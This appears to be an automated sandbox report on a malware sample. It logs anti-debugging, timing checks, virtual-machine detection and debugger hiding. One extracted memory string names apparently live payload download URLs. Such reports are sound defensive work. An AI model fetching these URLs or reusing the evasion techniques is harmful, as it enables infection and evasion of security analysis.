Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 00000000005677CE second address: 00000000005677CE instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 13311C4Bh 0x00000013 sub eax, 1A8CF406h 0x00000018 add eax, EA75BF22h 0x0000001d sub eax, E319E766h 0x00000022 cpuid 0x00000024 jmp 00007EFE34D2B39Ah 0x00000026 cmp bh, dh 0x00000028 bt ecx, 1Fh 0x0000002c jc 00007EFE34D2B971h 0x00000032 test dh, dh 0x00000034 popad 0x00000035 cmp cx, bx 0x00000038 call 00007EFE34D2B4BBh 0x0000003d lfence 0x00000040 rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 0000000000566C24 second address: 0000000000566C24 instructions:
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 0000000000565B7B second address: 0000000000565BB6 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp edx, ebx 0x0000000c test eax, eax 0x0000000e je 00007EFE34D2B700h 0x00000014 pushad 0x00000015 mov dl, 95h 0x00000017 cmp dl, FFFFFF95h 0x0000001a jne 00007EFE34D2EAEFh 0x00000020 popad 0x00000021 mov dword ptr [ebp+000000E8h], eax 0x00000027 fnop 0x00000029 test bh, ch 0x0000002b mov eax, ebp 0x0000002d add eax, 00000100h 0x00000032 test ecx, edx 0x00000034 mov dword ptr [eax], 4FD2ADFDh 0x0000003a pushad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 0000000000565BB6 second address: 0000000000565BED instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp edx, ebx 0x0000000c add dword ptr [eax], B8DD5D9Fh 0x00000012 pushad 0x00000013 mov dl, 11h 0x00000015 cmp dl, 00000011h 0x00000018 jne 00007EFE34BE0586h 0x0000001e popad 0x0000001f sub dword ptr [eax], 2B06605Eh 0x00000025 xor dword ptr [eax], DDA9ACEEh 0x0000002b fnop 0x0000002d test bh, ch 0x0000002f push 8402AFE5h 0x00000034 test ecx, edx 0x00000036 pushad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 0000000000565BED second address: 0000000000565BED instructions:
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 0000000000562B1D second address: 0000000000562B73 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 sub dword ptr [esp], E6F9D83Bh 0x0000000a test ch, dh 0x0000000c xor dword ptr [esp], A6CD49A4h 0x00000013 cmp cx, cx 0x00000016 mov eax, dword ptr [ebp+20h] 0x00000019 add eax, ebx 0x0000001b mov dword ptr [ebp+000001F5h], ecx 0x00000021 mov ecx, eax 0x00000023 push ecx 0x00000024 mov ecx, dword ptr [ebp+000001F5h] 0x0000002a pushad 0x0000002b mov ah, 76h 0x0000002d cmp ah, 00000076h 0x00000030 jne 00007EFE34BDE24Fh 0x00000036 popad 0x00000037 cmp ah, bh 0x00000039 mov dword ptr [ebp+0000027Ah], ebx 0x0000003f test edx, ecx 0x00000041 mov ebx, esi 0x00000043 push ebx 0x00000044 test esi, 05CEFCD7h 0x0000004a mov ebx, dword ptr [ebp+0000027Ah] 0x00000050 pushad 0x00000051 mov ebx, 000000D7h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 0000000000562BCB second address: 0000000000562BCB instructions:
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 0000000000563C85 second address: 0000000000563F54 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a sub edx, 22E6120Ah 0x00000010 xor edx, 256ED0EBh 0x00000016 cmp ax, 0000EAB4h 0x0000001a cmp dword ptr [esi+24h], edx 0x0000001d mov edx, dword ptr [ebp+00000273h] 0x00000023 je 00007EFE34BDD0C7h 0x00000029 mov ebx, 263052C4h 0x0000002e cmp dx, ax 0x00000031 xor ebx, B0E6794Fh 0x00000037 add ebx, 61B5A210h 0x0000003d pushad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 0000000000563F54 second address: 0000000000563F54 instructions:
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe RDTSC instruction interceptor: First address: 0000000000C298E4 second address: 0000000000C298EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\chkdsk.exe RDTSC instruction interceptor: First address: 0000000000C29B4E second address: 0000000000C29B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A5852 rdtsc 0_2_022A5852
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 5236 Thread sleep count: 146 > 30 Jump to behavior
Source: C:\Windows\explorer.exe TID: 5236 Thread sleep time: -292000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 1156 Thread sleep count: 67 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe TID: 1156 Thread sleep time: -335000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: explorer.exe, 0000001D.00000000.447733295.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000001D.00000000.447733295.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 0000001D.00000000.446760179.0000000008220000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000001D.00000000.447365137.0000000008640000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: F63V4i8eZU.exe, 00000000.00000002.316897484.0000000002B80000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: F63V4i8eZU.exe, 00000012.00000002.475431458.00000000006F0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exeMsi.dllPublishershell32advapi32TEMP=https://kinmirai.org/wp-content/bin_QVwEr224.binhttp://farmersschool.ge/bin_QVwEr224.binwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Source: explorer.exe, 0000001D.00000000.462940046.00000000055D0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 0000001D.00000000.447733295.000000000871F000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 0000001D.00000000.447733295.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 0000001D.00000000.447868275.00000000087D1000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00ices
Source: explorer.exe, 0000001D.00000000.462987107.0000000005603000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 0000001D.00000000.446760179.0000000008220000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: F63V4i8eZU.exe, 00000000.00000002.316897484.0000000002B80000.00000004.00000001.sdmp, F63V4i8eZU.exe, 00000012.00000002.475431458.00000000006F0000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: explorer.exe, 0000001D.00000000.446760179.0000000008220000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000001D.00000000.446760179.0000000008220000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Thread information set: HideFromDebugger Jump to behavior
Potentially malicious time measurement code found
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A5852 Start: 022A4BE7 End: 022A480D 0_2_022A5852
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A045E Start: 022A4BE7 End: 022A480D 0_2_022A045E
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A8DB4 Start: 022A4BE7 End: 022A480D 0_2_022A8DB4
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A423F Start: 022A4BE7 End: 022A480D 0_2_022A423F
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4263 Start: 022A4BE7 End: 022A480D 0_2_022A4263
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4277 Start: 022A4BE7 End: 022A480D 0_2_022A4277
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A5A46 Start: 022A5BED End: 022A480D 0_2_022A5A46
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A33A7 Start: 022A4BE7 End: 022A480D 0_2_022A33A7
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4128 Start: 022A4BE7 End: 022A480D 0_2_022A4128
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A513E Start: 022A4BE7 End: 022A480D 0_2_022A513E
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A46E4 Start: 022A4BE7 End: 022A480D 0_2_022A46E4
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A1FD9 Start: 022A4BE7 End: 022A480D 0_2_022A1FD9
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A7CA5 Start: 022A4BE7 End: 022A480D 0_2_022A7CA5
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A7488 Start: 022A4BE7 End: 022A480D 0_2_022A7488
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A5852 rdtsc 0_2_022A5852
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A6320 LdrInitializeThunk, 0_2_022A6320
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A5201 mov eax, dword ptr fs:[00000030h] 0_2_022A5201
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A7365 mov eax, dword ptr fs:[00000030h] 0_2_022A7365
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A33A7 mov eax, dword ptr fs:[00000030h] 0_2_022A33A7
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A33EC mov eax, dword ptr fs:[00000030h] 0_2_022A33EC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A28E2 mov eax, dword ptr fs:[00000030h] 0_2_022A28E2
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A7EFC mov eax, dword ptr fs:[00000030h] 0_2_022A7EFC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A348A mov eax, dword ptr fs:[00000030h] 0_2_022A348A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A6D92 mov eax, dword ptr fs:[00000030h] 0_2_022A6D92
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E47AE44 mov eax, dword ptr fs:[00000030h] 18_2_1E47AE44
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E47AE44 mov eax, dword ptr fs:[00000030h] 18_2_1E47AE44
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E47EA55 mov eax, dword ptr fs:[00000030h] 18_2_1E47EA55
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E444257 mov eax, dword ptr fs:[00000030h] 18_2_1E444257
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F4A2C mov eax, dword ptr fs:[00000030h] 18_2_1E3F4A2C
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F4A2C mov eax, dword ptr fs:[00000030h] 18_2_1E3F4A2C
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3BE620 mov eax, dword ptr fs:[00000030h] 18_2_1E3BE620
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3D3A1C mov eax, dword ptr fs:[00000030h] 18_2_1E3D3A1C
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3EA61C mov eax, dword ptr fs:[00000030h] 18_2_1E3EA61C
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3EA61C mov eax, dword ptr fs:[00000030h] 18_2_1E3EA61C
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E46B260 mov eax, dword ptr fs:[00000030h] 18_2_1E46B260
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E46B260 mov eax, dword ptr fs:[00000030h] 18_2_1E46B260
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E488A62 mov eax, dword ptr fs:[00000030h] 18_2_1E488A62
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B5210 mov eax, dword ptr fs:[00000030h] 18_2_1E3B5210
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B5210 mov ecx, dword ptr fs:[00000030h] 18_2_1E3B5210
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B5210 mov eax, dword ptr fs:[00000030h] 18_2_1E3B5210
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B5210 mov eax, dword ptr fs:[00000030h] 18_2_1E3B5210
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3BAA16 mov eax, dword ptr fs:[00000030h] 18_2_1E3BAA16
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3BAA16 mov eax, dword ptr fs:[00000030h] 18_2_1E3BAA16
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C8A0A mov eax, dword ptr fs:[00000030h] 18_2_1E3C8A0A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3BC600 mov eax, dword ptr fs:[00000030h] 18_2_1E3BC600
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3BC600 mov eax, dword ptr fs:[00000030h] 18_2_1E3BC600
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3BC600 mov eax, dword ptr fs:[00000030h] 18_2_1E3BC600
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E8E00 mov eax, dword ptr fs:[00000030h] 18_2_1E3E8E00
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F927A mov eax, dword ptr fs:[00000030h] 18_2_1E3F927A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3DAE73 mov eax, dword ptr fs:[00000030h] 18_2_1E3DAE73
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3DAE73 mov eax, dword ptr fs:[00000030h] 18_2_1E3DAE73
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3DAE73 mov eax, dword ptr fs:[00000030h] 18_2_1E3DAE73
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3DAE73 mov eax, dword ptr fs:[00000030h] 18_2_1E3DAE73
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3DAE73 mov eax, dword ptr fs:[00000030h] 18_2_1E3DAE73
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E471608 mov eax, dword ptr fs:[00000030h] 18_2_1E471608
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C766D mov eax, dword ptr fs:[00000030h] 18_2_1E3C766D
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E46FE3F mov eax, dword ptr fs:[00000030h] 18_2_1E46FE3F
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B9240 mov eax, dword ptr fs:[00000030h] 18_2_1E3B9240
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B9240 mov eax, dword ptr fs:[00000030h] 18_2_1E3B9240
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B9240 mov eax, dword ptr fs:[00000030h] 18_2_1E3B9240
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B9240 mov eax, dword ptr fs:[00000030h] 18_2_1E3B9240
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C7E41 mov eax, dword ptr fs:[00000030h] 18_2_1E3C7E41
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C7E41 mov eax, dword ptr fs:[00000030h] 18_2_1E3C7E41
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C7E41 mov eax, dword ptr fs:[00000030h] 18_2_1E3C7E41
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C7E41 mov eax, dword ptr fs:[00000030h] 18_2_1E3C7E41
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C7E41 mov eax, dword ptr fs:[00000030h] 18_2_1E3C7E41
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C7E41 mov eax, dword ptr fs:[00000030h] 18_2_1E3C7E41
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E46FEC0 mov eax, dword ptr fs:[00000030h] 18_2_1E46FEC0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3CAAB0 mov eax, dword ptr fs:[00000030h] 18_2_1E3CAAB0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3CAAB0 mov eax, dword ptr fs:[00000030h] 18_2_1E3CAAB0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3EFAB0 mov eax, dword ptr fs:[00000030h] 18_2_1E3EFAB0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B52A5 mov eax, dword ptr fs:[00000030h] 18_2_1E3B52A5
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B52A5 mov eax, dword ptr fs:[00000030h] 18_2_1E3B52A5
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B52A5 mov eax, dword ptr fs:[00000030h] 18_2_1E3B52A5
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B52A5 mov eax, dword ptr fs:[00000030h] 18_2_1E3B52A5
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B52A5 mov eax, dword ptr fs:[00000030h] 18_2_1E3B52A5
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E488ED6 mov eax, dword ptr fs:[00000030h] 18_2_1E488ED6
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3ED294 mov eax, dword ptr fs:[00000030h] 18_2_1E3ED294
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3ED294 mov eax, dword ptr fs:[00000030h] 18_2_1E3ED294
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E44FE87 mov eax, dword ptr fs:[00000030h] 18_2_1E44FE87
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E2AE4 mov eax, dword ptr fs:[00000030h] 18_2_1E3E2AE4
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E16E0 mov ecx, dword ptr fs:[00000030h] 18_2_1E3E16E0
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C76E2 mov eax, dword ptr fs:[00000030h] 18_2_1E3C76E2
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E4346A7 mov eax, dword ptr fs:[00000030h] 18_2_1E4346A7
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E480EA5 mov eax, dword ptr fs:[00000030h] 18_2_1E480EA5
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E480EA5 mov eax, dword ptr fs:[00000030h] 18_2_1E480EA5
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E480EA5 mov eax, dword ptr fs:[00000030h] 18_2_1E480EA5
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E36CC mov eax, dword ptr fs:[00000030h] 18_2_1E3E36CC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E2ACB mov eax, dword ptr fs:[00000030h] 18_2_1E3E2ACB
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F8EC7 mov eax, dword ptr fs:[00000030h] 18_2_1E3F8EC7
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3EE730 mov eax, dword ptr fs:[00000030h] 18_2_1E3EE730
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E488B58 mov eax, dword ptr fs:[00000030h] 18_2_1E488B58
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B4F2E mov eax, dword ptr fs:[00000030h] 18_2_1E3B4F2E
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3B4F2E mov eax, dword ptr fs:[00000030h] 18_2_1E3B4F2E
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E488F6A mov eax, dword ptr fs:[00000030h] 18_2_1E488F6A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3DF716 mov eax, dword ptr fs:[00000030h] 18_2_1E3DF716
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3EA70E mov eax, dword ptr fs:[00000030h] 18_2_1E3EA70E
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3EA70E mov eax, dword ptr fs:[00000030h] 18_2_1E3EA70E
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E3B7A mov eax, dword ptr fs:[00000030h] 18_2_1E3E3B7A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E3B7A mov eax, dword ptr fs:[00000030h] 18_2_1E3E3B7A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E48070D mov eax, dword ptr fs:[00000030h] 18_2_1E48070D
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E48070D mov eax, dword ptr fs:[00000030h] 18_2_1E48070D
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E44FF10 mov eax, dword ptr fs:[00000030h] 18_2_1E44FF10
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E44FF10 mov eax, dword ptr fs:[00000030h] 18_2_1E44FF10
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3BDB60 mov ecx, dword ptr fs:[00000030h] 18_2_1E3BDB60
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E47131B mov eax, dword ptr fs:[00000030h] 18_2_1E47131B
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3CFF60 mov eax, dword ptr fs:[00000030h] 18_2_1E3CFF60
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3BF358 mov eax, dword ptr fs:[00000030h] 18_2_1E3BF358
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3BDB40 mov eax, dword ptr fs:[00000030h] 18_2_1E3BDB40
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3CEF40 mov eax, dword ptr fs:[00000030h] 18_2_1E3CEF40
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E4353CA mov eax, dword ptr fs:[00000030h] 18_2_1E4353CA
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E4353CA mov eax, dword ptr fs:[00000030h] 18_2_1E4353CA
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E4BAD mov eax, dword ptr fs:[00000030h] 18_2_1E3E4BAD
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E4BAD mov eax, dword ptr fs:[00000030h] 18_2_1E3E4BAD
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E4BAD mov eax, dword ptr fs:[00000030h] 18_2_1E3E4BAD
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C8794 mov eax, dword ptr fs:[00000030h] 18_2_1E3C8794
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3E2397 mov eax, dword ptr fs:[00000030h] 18_2_1E3E2397
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3EB390 mov eax, dword ptr fs:[00000030h] 18_2_1E3EB390
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C1B8F mov eax, dword ptr fs:[00000030h] 18_2_1E3C1B8F
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3C1B8F mov eax, dword ptr fs:[00000030h] 18_2_1E3C1B8F
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E46D380 mov ecx, dword ptr fs:[00000030h] 18_2_1E46D380
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3F37F5 mov eax, dword ptr fs:[00000030h] 18_2_1E3F37F5
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E47138A mov eax, dword ptr fs:[00000030h] 18_2_1E47138A
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E3DDBE9 mov eax, dword ptr fs:[00000030h] 18_2_1E3DDBE9
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E437794 mov eax, dword ptr fs:[00000030h] 18_2_1E437794
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E437794 mov eax, dword ptr fs:[00000030h] 18_2_1E437794
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 18_2_1E437794 mov eax, dword ptr fs:[00000030h] 18_2_1E437794
